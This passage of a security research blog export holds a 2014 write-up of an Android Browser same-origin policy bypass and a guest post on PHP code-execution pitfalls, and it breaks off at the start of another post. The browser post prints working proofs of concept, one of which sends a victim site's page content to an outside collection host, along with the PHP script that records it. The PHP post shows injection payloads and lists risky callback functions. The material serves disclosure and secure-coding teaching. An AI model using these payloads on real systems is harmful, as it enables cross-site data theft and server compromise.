<li>Limit physical access. Because most modems have a physical hard-reset key/button, they should remain in a secured environment that only authorized people can reach.</li>
</ol>
<h4 style="text-align: left;">
About the Author:</h4>
<div style="text-align: left;">
This article is a guest post by Paulos Yibelo. Yibelo is the newest member of the RHA family. He is a full-time PHP coder and most of his research involves application security. In his free time he loves writing articles related to application security: <a href="http://paulosyibelo.blogspot.com/" rel="nofollow" target="_blank">http://paulosyibelo.blogspot.com/</a></div>
<div style="text-align: left;">
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-27666339384440322052014-10-02T04:53:00.000-07:002020-05-27T14:34:43.558-07:00A Tale Of Another SOP Bypass In Android Browser < 4.4<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvgyfHGKRcenjfnCPhmNBDkYB3CJcBfVh2_pittlG_KS-OfLxsnewYKauYxHfVLwPibMrZgUKimwRCFZnotrLLyQRirKhn-R6cDDkxpRIeBjCsNIAsstm93S43xUuo6OEO1dAAWKoMmM/s1600/Pirate.jpg" /></a></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Since my recent <a href="http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html" rel="nofollow" target="_blank">Android SOP bypass [CVE-2014-6041]</a> caused quite a stir in the infosec community, I was motivated to research the Android browser a bit more. It turns out that things are much worse than I thought: I managed to trigger quite a few interesting vulnerabilities inside the Android browser, one of them being another Same Origin Policy bypass. What makes it worse is that the same SOP bypass was already <a href="http://trac.webkit.org/changeset/96826" rel="nofollow" target="_blank">fixed</a> in Chrome years ago; however, the patches were not applied to the Android browser < 4.4.<br />
<a name='more'></a><br />
<h4>
Proof Of Concept</h4>
The following is the proof of concept:<br />
<br />
<script><br />
window.onload = function()<br />
{<br />
object = document.createElement("object"); <br />
object.setAttribute("data", "http://www.bing.com");<br />
document.body.appendChild(object);<br />
object.onload = function() {<br />
object.setAttribute("data", "javascript:alert(document.domain)");<br />
object.innerHTML = "foobar";<br />
}<br />
}<br />
</script><br />
<div>
<br /></div>
<div>
<br />
The PoC is easy to understand for anyone with some JavaScript background; for others, let me break it down. The code above creates an object element with a data attribute that loads a URL from another origin, in this case "<b>http://www.bing.com</b>". Once it has loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting detail is that the last line, <b>object.innerHTML = "foobar";</b>, is essential for the PoC to work, because it is what causes the navigation request to be performed.<br />
<br />
Let's take a look at the vulnerable code responsible for causing the issue:<br />
<h4>
Vulnerable Code</h4>
bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)<br />
{<br />
ASSERT(document());<br />
ASSERT(document()->frame());<br />
if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)<br />
return false;<br />
<b><u><span style="color: red;">KURL completeURL = document()->completeURL(url);</span></u></b><br />
<br />
<br />
The above function is responsible for loading the frame URL. If you take a close look at the code, you will notice there is no validation of the javascript: scheme, which allows us to execute JavaScript in the context of the frame that was loaded.<br />
<h4>
The fix</h4>
The issue was <a href="https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef%5E%21/#F0" rel="nofollow" target="_blank">fixed </a>by applying the following check, which uses the <b>securityorigin.h</b> library. <br />
<br />
if (contentFrame() &&<span style="color: red;"> protocolIsJavaScript(completeURL)</span><br />
&& !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))<br />
return false;<br />
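To show why the added check closes the hole, here is an added JavaScript model of the check before and after the fix (this is not WebKit's or the post's code). <code>protocolIsJavaScript</code>, <code>canAccess</code> and the frame limit are simplified stand-ins for WebKit's helpers, the other checks the real function performs are omitted, and the origins used are constructed.

```javascript
// Added example, not WebKit's or the post's code: a model of the
// allowedToLoadFrameURL check before and after the fix described above.
// protocolIsJavaScript(), canAccess() and the frame limit are simplified
// stand-ins for the WebKit helpers; other checks of the real function
// are omitted. All origins below are constructed for the demonstration.

const MAX_NUMBER_OF_FRAMES = 1000; // stand-in for Page::maxNumberOfFrames

// Simplified stand-in for WebKit's protocolIsJavaScript(): ignore leading
// whitespace/control characters and compare the scheme case-insensitively,
// so "  JavaScript:..." is still recognised as a javascript: URL.
function protocolIsJavaScript(url) {
  const s = String(url).replace(/^[\s\x00-\x1f]+/, "");
  return /^javascript:/i.test(s);
}

// The (scheme, host, port) tuple that a security origin is compared on.
function originOf(url) {
  const u = new URL(url);
  return { scheme: u.protocol.replace(":", ""), host: u.hostname, port: u.port };
}

// Simplified stand-in for SecurityOrigin::canAccess(): same-origin tuple.
function canAccess(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Pre-fix logic as shown in the vulnerable snippet: only the frame-count
// limit is applied, so a javascript: URL passes straight through to the
// navigation and runs in the origin already loaded in the object.
function allowedToLoadFrameURLVulnerable(url, page) {
  if (page.frameCount >= MAX_NUMBER_OF_FRAMES) return false;
  return true;
}

// Post-fix logic: when the object already holds a content frame, a
// javascript: URL is only allowed if the embedding document could access
// that frame's document anyway, i.e. they are same-origin.
function allowedToLoadFrameURLFixed(url, page, ownerOrigin, contentOrigin) {
  if (page.frameCount >= MAX_NUMBER_OF_FRAMES) return false;
  if (contentOrigin && protocolIsJavaScript(url) &&
      !canAccess(ownerOrigin, contentOrigin)) {
    return false;
  }
  return true;
}

// Constructed scenario mirroring the PoC: a page on attacker.example embeds
// www.bing.com in an <object>, then swaps its data to a javascript: URL.
function runScenario() {
  const page = { frameCount: 1 };
  const owner = originOf("http://attacker.example/");
  const content = originOf("http://www.bing.com/");
  const jsUrl = "javascript:alert(document.domain)";

  const before = allowedToLoadFrameURLVulnerable(jsUrl, page);          // true: bypass
  const after = allowedToLoadFrameURLFixed(jsUrl, page, owner, content); // false: blocked
  // A javascript: URL into a same-origin frame is still permitted.
  const sameOrigin = allowedToLoadFrameURLFixed(jsUrl, page, owner,
                                                originOf("http://attacker.example/x"));
  // An ordinary cross-origin navigation is unaffected by the fix.
  const plainNav = allowedToLoadFrameURLFixed("http://www.bing.com", page, owner, content);
  // The pre-existing frame limit still applies.
  const tooMany = allowedToLoadFrameURLFixed("http://www.bing.com",
                                             { frameCount: MAX_NUMBER_OF_FRAMES }, owner, content);
  return { before, after, sameOrigin, plainNav, tooMany };
}
```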
<h4>
Proof Of Concept Using Postmessage Call</h4>
To understand the vulnerability better and get to the root cause, I contacted Joe Vennix from the Metasploit team, who modified my original PoC to the following to demonstrate the vulnerability more effectively. This PoC uses the postMessage call from the HTML5 world to send document.cookie and innerHTML to the main window.<br />
<br />
<script><br />
window.onload = function()<br />
{<br />
object = document.createElement("object");<br />
object.setAttribute("data", "http://www.bing.com");<br />
document.body.appendChild(object);<br />
object.onload = function() {<br />
object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";<br />
object.innerHTML = "foobar";<br />
}<br />
}<br />
<br />
window.onmessage = function(m){<br />
alert(m.data);<br />
}<br />
</script><br />
<br />
<h4>
Proof Of Concept To Steal Data Across Domains</h4>
A great friend of mine, @filedescriptor, helped me with the following PoC, which steals data from bing.com by reading the document.body.innerHTML property and submits that data cross-origin using a POST request, since you can only send a limited amount of data with GET due to browser restrictions.<br />
<br />
<script><br />
window.onload = function()<br />
{<br />
object = document.createElement("object");<br />
object.setAttribute("data", "http://www.bing.com");<br />
document.body.appendChild(object);<br />
object.onload = function() {<br />
object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";<br />
object.innerHTML = "foobar";<br />
}<br />
}<br />
</script></div>
<div>
<br />
The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.<br />
<b><br /></b>
<b>file_put_contents('record.txt', $_POST['content']);</b><br />
<br />
The following are some of the handsets that we used to test and verify this vulnerability.<br />
<h4>
Sony Xperia</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj70rg_CkjdPfY70O4IKePszLFstMCp78P7yiGBygwIJ84xLvi1DPBxKvZsrm89Ufkc8znNJNKAE5sSKnm9uQMxUNwOiX5PbonJfm6rHMCFJyXoJJjBa9I8SVdpNxw9LRayPSV8Oxtipvg/s1600/SONY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj70rg_CkjdPfY70O4IKePszLFstMCp78P7yiGBygwIJ84xLvi1DPBxKvZsrm89Ufkc8znNJNKAE5sSKnm9uQMxUNwOiX5PbonJfm6rHMCFJyXoJJjBa9I8SVdpNxw9LRayPSV8Oxtipvg/s1600/SONY.png" height="640" width="364" /></a></div>
<h4>
LGNexus4</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijoY6u5eDaoopqbnAdZJD8crVPKhS8nWQu4R0oTXNuxe4oZ1D617ckmw2dubdaRBANED5HReHoPunPmeMZFEAYyJxABrmye9zBNDhnuAX5MLBe8GGHwMyfxveZCVxsNb8cvgJcp_Rxqjk/s1600/LGNEXUS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijoY6u5eDaoopqbnAdZJD8crVPKhS8nWQu4R0oTXNuxe4oZ1D617ckmw2dubdaRBANED5HReHoPunPmeMZFEAYyJxABrmye9zBNDhnuAX5MLBe8GGHwMyfxveZCVxsNb8cvgJcp_Rxqjk/s1600/LGNEXUS.png" height="640" width="320" /></a></div>
<h4>
Samsung Galaxy S3</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_L_-QcSBjU6AP3gZW0baC9C0ASrqJLWyVF_QDCKHQ2DDtiFC6aciTXPAJZx2O5HbRoKpw5GwJuq87nLWaVFsQ3J6RYhyPU4HLLA43TlrRa2pIWhkyLfjrY50cw3OQGY29UEXeN287S90/s1600/samsung+galaxy+s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_L_-QcSBjU6AP3gZW0baC9C0ASrqJLWyVF_QDCKHQ2DDtiFC6aciTXPAJZx2O5HbRoKpw5GwJuq87nLWaVFsQ3J6RYhyPU4HLLA43TlrRa2pIWhkyLfjrY50cw3OQGY29UEXeN287S90/s1600/samsung+galaxy+s3.png" height="640" width="322" /></a></div>
<h4>
Safari Browser 5.0</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcV6k9DGdDHsG8gH_S0I4a_1TYNhm7xJCFEHMZI-6sJVPZn0zNFMnulQolN42Bia1ep6bdWuX_9NcC6tQ_h5V0Q72RwX1XxIs__hmXESRfIYn5dYo9Ioe10VcHGlDLNg7xQnLRDdabfWU/s1600/safari+5.0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcV6k9DGdDHsG8gH_S0I4a_1TYNhm7xJCFEHMZI-6sJVPZn0zNFMnulQolN42Bia1ep6bdWuX_9NcC6tQ_h5V0Q72RwX1XxIs__hmXESRfIYn5dYo9Ioe10VcHGlDLNg7xQnLRDdabfWU/s1600/safari+5.0.png" height="348" width="400" /></a></div>
<h4>
Google's Response</h4>
The vulnerability was responsibly disclosed to Google on 9/25/2014 and fixed on 10/1/2014; the patches have been released <a href="https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef" rel="nofollow" target="_blank">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7p6DqDTZg3q_RF3DpDSNdNd1qnmInbUtBuwiqdK52nn_wKCXiXE2-_m75bcgroD-5CQ2nsjbx4LoS-xMEKdPItiwyL67U6PLAovTIwm5PotklmXFAXf9VMXhWdSZT67eRurqXtMrehec/s1600/jb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7p6DqDTZg3q_RF3DpDSNdNd1qnmInbUtBuwiqdK52nn_wKCXiXE2-_m75bcgroD-5CQ2nsjbx4LoS-xMEKdPItiwyL67U6PLAovTIwm5PotklmXFAXf9VMXhWdSZT67eRurqXtMrehec/s1600/jb.png" height="137" width="577" /></a></div>
</div>
</div>
<h4>
In Closing</h4>
<div>
There are tons of other browsers with a huge user base that are vulnerable to the same vulnerability, Maxthon, CM Browser and Safari 5.0 to name a few. If you are still using the Android browser or any of these other browsers, you should immediately apply patches or switch to Chrome or Firefox. I believe there are several other vulnerabilities that were addressed in Chrome's WebKit and still have not been addressed inside the Android browser, therefore it is recommended to avoid it completely.<br />
<br />
<b><br /></b>
<b>Press Coverage</b><br />
<br />
http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html<br />
<br />
http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/<br />
<br />
http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser<br />
<br />
http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser<br />
<br />
http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html<br />
<br />
http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html<br />
<br />
http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/<br />
<br />
https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/<br />
<br />
http://www.net-security.org/secworld.php?id=17459<br />
<br />
http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/<br />
<br />
http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1<br />
<br />
http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all<br />
<br />
http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/<br />
<br />
http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/a-tale-of-another-sop-bypass-in-android.html";
</script>Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com3tag:blogger.com,1999:blog-3121270199089759062.post-38198963834326646392014-09-20T11:39:00.002-07:002020-05-27T14:34:59.658-07:00Indepth Code Execution in PHP: Part Two<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoOug2ZnojyH1QIH_XVXWFTm6v0JP85Fdb3rUDpBpL-0Id61C2hC4hO-mGpDPgbduQE3C7pjBEtLo2YLBSnwLDttIc1RZVNLgYC3E-ATUouk18qlWi57985irleqKNZhjkfi3XFcffPng/s1600/phpbugs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoOug2ZnojyH1QIH_XVXWFTm6v0JP85Fdb3rUDpBpL-0Id61C2hC4hO-mGpDPgbduQE3C7pjBEtLo2YLBSnwLDttIc1RZVNLgYC3E-ATUouk18qlWi57985irleqKNZhjkfi3XFcffPng/s1600/phpbugs.PNG" height="185" width="320" /></a></div>
<br />
This is a continuation of Code Execution in PHP; you can read the first post <a href="http://www.rafayhackingarticles.net/2014/08/remote-code-execution-in-php-explained.html" target="_blank">here</a>. If you haven't read it yet, please do so first or you may have trouble following the second part.<br />
<br />
“…It’s no secret that PHP is an easy language that anyone with amateur coding skills can work with and, as a rule, with poor knowledge of basic security concepts; this factor alone often leads to new, poorly written web applications, thus compromising their hosts and allowing the extraction of sensitive information. Recently, I was on a pentest for a project I was working on and noticed an unusual type of code execution. I decided to write about code execution in depth because developers need to focus on their poorly written PHP web applications. This article will try to cover code execution flaws in less predictable places and detail snippets of code which might look secure while providing possibilities for ‘code injection’...”<br />
<br />
<a name='more'></a><br />
<br />
In the earlier article, I tried to cover practical examples which could potentially lead to Remote Command Execution (RCE) in PHP. Now let’s discuss some other methods and mistakes a PHP developer might have made when writing a web application.<br />
<br />
<h4 style="text-align: left;">
Curly Braces:</h4>
<div style="text-align: left;">
They say curly syntax is meant to separate code from strings. In contrast to this view, what it actually does is ‘embed’ it. As the PHP manual puts it, the syntax allows the use of complex expressions (very complex ones, but let’s stick with minimal complexity for the sake of the demonstration).<br />
<br />
Imagine curly braces being used this way:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<?php<br />
if (isset($_GET['year'])) {<br />
$year = $_GET['year'];<br />
$finalize = "My birthday is 19{$year}.";<br />
print $finalize;<br />
}<br />
?></blockquote>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3AmBJ1nBS4Cj0l3qnEhBt7DMsXW5dGMNa4v-BvTmdgyUZhbK68aCLmkDqrtirCYl5gOZu7mykp3p7i-hjnvhqXFkAp285v8o8mvnqUOZIqEmOcbgM0I4YPyzkg74h6_EDzhMzvVVKaHv/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt3AmBJ1nBS4Cj0l3qnEhBt7DMsXW5dGMNa4v-BvTmdgyUZhbK68aCLmkDqrtirCYl5gOZu7mykp3p7i-hjnvhqXFkAp285v8o8mvnqUOZIqEmOcbgM0I4YPyzkg74h6_EDzhMzvVVKaHv/s1600/1.PNG" /></a></div>
<div style="text-align: left;">
<br />
The code is supposed to ‘echo’ the year variable (e.g. 97) embedded inside “My birthday is 19xx”, so if a user submits ‘12’ as the ‘year’ input, the code prints “My birthday is 1912”.<br />
<br />
Maliciously submitting an input such as ‘dir’ would end up listing the files and folders of the current directory when $finalize is evaluated by PHP. This in turn would hand useful information to a web attacker. Other commands are possible; I used ‘dir’ simply because it is reliably simple!<br />
<br />
Let’s imagine cases like:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
$brief="I was here until ${`dir`} appeared here";</blockquote>
<div style="text-align: left;">
<br />
In the code above, the system command ‘dir’ gets executed. Why did that happen? The expression between the curly braces is evaluated and its result replaces ${`dir`}, which PHP then treats as a variable name. That is why PHP complains about an undefined variable in this case. What happened is fairly similar to:</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
<?php<br />
eval("$brief");<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkDmC9go7_sEzWJA3Szin2qtvZiDS6xEMxN03vTRBO6It2L9gm9DiIlOVK5KlpDcQ4z4c2X6DcP9KGEB6JO9lhdUNc2_ybTOjq6wHOxdKAwbHxNW3mWOfSph5K1m8paqa9ymk66k3F23g/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYkDmC9go7_sEzWJA3Szin2qtvZiDS6xEMxN03vTRBO6It2L9gm9DiIlOVK5KlpDcQ4z4c2X6DcP9KGEB6JO9lhdUNc2_ybTOjq6wHOxdKAwbHxNW3mWOfSph5K1m8paqa9ymk66k3F23g/s1600/3.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
“$brief” holds the output of the “dir” command as a string. A similar malicious case, allowing a web attacker to execute functions and exfiltrate information, would be:</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
<?php<br />
$name='phpinfo';<br />
${'name'}();<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGtKVaqlO0hb5td3354HFpU2S8CPXPJP1rSW7uChb-9lGsU4tPOCa0Y1Ry_OmZrDPDAjcLGpH5iDTbZq9LcuK18H4fgUDNpCwnKFyfzHh4bjMvAoCN4RCbM-lPDLdCAQa-FyCxsMgm52SW/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGtKVaqlO0hb5td3354HFpU2S8CPXPJP1rSW7uChb-9lGsU4tPOCa0Y1Ry_OmZrDPDAjcLGpH5iDTbZq9LcuK18H4fgUDNpCwnKFyfzHh4bjMvAoCN4RCbM-lPDLdCAQa-FyCxsMgm52SW/s1600/4.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
If the above example stored $name from a submitted username, and the username submitted was ‘phpinfo’, the malicious request would lead to code execution and sensitive information disclosure. </div>
<h4 style="text-align: left;">
Other Cases:</h4>
<div style="text-align: left;">
<br />
There are functions such as assert() which can be exploited just like eval() but are rarely known to web developers; they are often found in CTF challenges. </div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<?php<br />
$name='phpinfo()';<br />
assert($name);<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsgn3dH0nhDEuY9LWjkahZv_nzUzUdwCQTFe2xfGOfZn8cGztmFk9qAD1g1Z0S-avP2MgkwZlzW_qjh9VkCmjd_iI1qgHaviiwqwt837KN-NdmpEsyqqiFzJNqI5vVquxkjY2UZCAQzqLj/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsgn3dH0nhDEuY9LWjkahZv_nzUzUdwCQTFe2xfGOfZn8cGztmFk9qAD1g1Z0S-avP2MgkwZlzW_qjh9VkCmjd_iI1qgHaviiwqwt837KN-NdmpEsyqqiFzJNqI5vVquxkjY2UZCAQzqLj/s1600/5.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
assert() is designed to help with debugging, not with evaluating arbitrary input, yet it evaluates a string argument as PHP code, which leads to code execution. So if you pass user-supplied input which you think is trustworthy to assert(), your code might well be vulnerable to Remote Code Execution (RCE) through malicious payloads from users of the application you trust.<br />
<br />
Developers use array functions to apply a function to a list of data, or the reverse. In most cases the applied functions are predefined, and these types of vulnerabilities are almost unknown to the public.<br />
<br />
Anyway, these are the array functions I have dealt with which could lead to RCE:</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
array_intersect_uassoc(), usort(), uksort(), array_filter(),<br />
array_diff_uassoc(), array_diff_ukey(), array_reduce(),<br />
array_udiff(), array_udiff_assoc(), array_udiff_uassoc(),<br />
array_intersect_assoc(), array_uintersect(), array_uintersect_assoc(),<br />
array_uintersect_uassoc(), array_walk(), array_walk_recursive(),<br />
uasort(), array_map()</blockquote>
<div style="text-align: left;">
<br />
In short, don’t use those with user-supplied input unless it is sanitized properly. The formula for an almost secure web application is to never trust input from users!<br />
<br />
Let’s take the last function (array_map) as an example and exploit it:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<?php<br />
$evil =$_GET['name'];<br />
$some_array=array(0,1,2,3);<br />
$new_array=array_map($evil,$some_array);<br />
?></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ3ToZy3BFCzR4qvXgzoCjWG32OJ6Sh6YTcP4ywz3hcxqK9F3r8R2SJRCrd62yh_Tjk0AtAUYTtR6fZA_xGIPYkCCPwVNEgaTCA_hub65CJNx7Gvi3v26i3Hbv6uvCENqGCT0BWEM9goVc/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ3ToZy3BFCzR4qvXgzoCjWG32OJ6Sh6YTcP4ywz3hcxqK9F3r8R2SJRCrd62yh_Tjk0AtAUYTtR6fZA_xGIPYkCCPwVNEgaTCA_hub65CJNx7Gvi3v26i3Hbv6uvCENqGCT0BWEM9goVc/s1600/6.PNG" /></a></div>
<br />
<div style="text-align: left;">
<br />
Honestly, this is a rare snippet of code, but to prove the point behind mysterious remote code execution attacks, let me explain what it does. It receives a parameter called ‘name’ via a GET request and uses this parameter as the function to map over an array called ‘$some_array’. The function is designed to execute callbacks, i.e. to call whatever function is named by its first argument. Developers following insecure coding practices do not realise this, which leads to RCE with requests like the following:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
http://localhost/index.php?name=phpinfo</blockquote>
<div style="text-align: left;">
<br />
The payload ‘phpinfo’ will be executed, and the result is a remote code execution bug that exists purely due to insecure coding practices. This is practical, but there is a limitation: we can only call already defined functions like phpinfo() or uname(), not write arbitrary code to be executed.<br />
<br />
The following functions also use callbacks, but they are not array based like the previous ones. They can however be used to create situations like the ones demonstrated earlier in this article, so do not use them with user-supplied input.</div>
<div style="text-align: left;">
<br /></div>
<blockquote>
stream_filter_register(), set_error_handler()<br />
register_shutdown_function(), register_tick_function()</blockquote>
<div style="text-align: left;">
<br />
And some XML functions enabled by default in PHP:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>xml_set_character_data_handler()</li>
<li>xml_set_element_handler()</li>
<li>xml_set_end_namespace_decl_handler()</li>
<li>xml_set_external_entity_ref_handler()</li>
<li>xml_set_notation_decl_handler()</li>
<li>xml_set_default_handler()</li>
</ul>
<div style="text-align: left;">
<br />
or pretty much, xml_set_*_*()<br />
<br />
Remember: callbacks and the functions that use them are good! However, in certain cases they are very bad for the logic of the application, as we have witnessed in this article. Most of the issues covered weren’t vulnerabilities. In fact, they were features of PHP. But improper use of these *features* can lead to real vulnerabilities, handing a <a href="http://blog.czarsecurities.com/1077/9-5-job-is-too-old-school-for-a-hacker-meet-shritam-bhowmick/" target="_blank">web attacker</a> an opportunity to compromise the security of an application. Please be wise and read the manual of a (new) function before using it in practical code and running it on production servers.<br />
<br />
Happy Hacking!</div>
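The array_map() pattern discussed above beside a hardened form, as an added example (not the guest post's own code); the function names mapUnsafe() and mapSafe(), the ALLOWED_TRANSFORMS table and the sample input are assumptions constructed for this demonstration:

```php
<?php
// Added example, not from the original article: the user-controlled
// callback pattern described above (array_map($evil, ...)), beside a
// hardened version that only accepts callbacks from a fixed allow-list.
// mapUnsafe(), mapSafe(), ALLOWED_TRANSFORMS and $sample are constructed
// for this demonstration.

// Vulnerable pattern: the callback name comes straight from the request,
// so any callable built-in (the article's example is 'phpinfo') is invoked
// once per element. is_callable() or function_exists() would not help:
// both return true for 'phpinfo' and 'system'.
function mapUnsafe(array $request, array $data): array
{
    $callback = $request['name'] ?? 'trim';
    return array_map($callback, $data);
}

// Hardened pattern: the request value is only ever used as a key into a
// fixed table, so the function name itself never comes from the user.
const ALLOWED_TRANSFORMS = [
    'upper' => 'strtoupper',
    'lower' => 'strtolower',
    'trim'  => 'trim',
];

function mapSafe(array $request, array $data): array
{
    $choice = $request['name'] ?? 'trim';
    // Reject non-string input (e.g. ?name[]=x) and anything outside the
    // table before any function is called.
    if (!is_string($choice) || !array_key_exists($choice, ALLOWED_TRANSFORMS)) {
        throw new InvalidArgumentException('Unknown transform: ' . json_encode($choice));
    }
    return array_map(ALLOWED_TRANSFORMS[$choice], $data);
}

// The same rule covers the article's other cases: variable functions
// ($name()), assert() with a string argument (evaluated as code in PHP 5
// and 7, removed in PHP 8), and the usort()/array_walk()/xml_set_*_handler()
// family, all of which take a callback.

$sample = ['  alice ', 'BOB'];   // constructed sample input

// Benign request: both versions behave identically.
print_r(mapUnsafe(['name' => 'strtoupper'], $sample));
print_r(mapSafe(['name' => 'upper'], $sample));

// Hostile request: mapUnsafe() would run phpinfo() once per element;
// mapSafe() refuses before anything is called.
try {
    mapSafe(['name' => 'phpinfo'], $sample);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```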
<h4 style="text-align: left;">
About the Author </h4>
<div style="text-align: left;">
This article is a guest post by Paulos Yibelo. Yibelo is the newest member of the RHA family. He is a full-time PHP coder and most of his research involves application security. In his free time he loves writing articles on application security at <a href="http://paulosyibelo.blogspot.com/" target="_blank">http://paulosyibelo.blogspot.com/</a>.</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/indepth-code-execution-in-php-part-two.html";
</script>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-44480108342468873102014-08-31T02:33:00.000-07:002020-05-27T14:35:22.150-07:00Android Browser Same Origin Policy Bypass < 4.4 - CVE-2014-6041<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
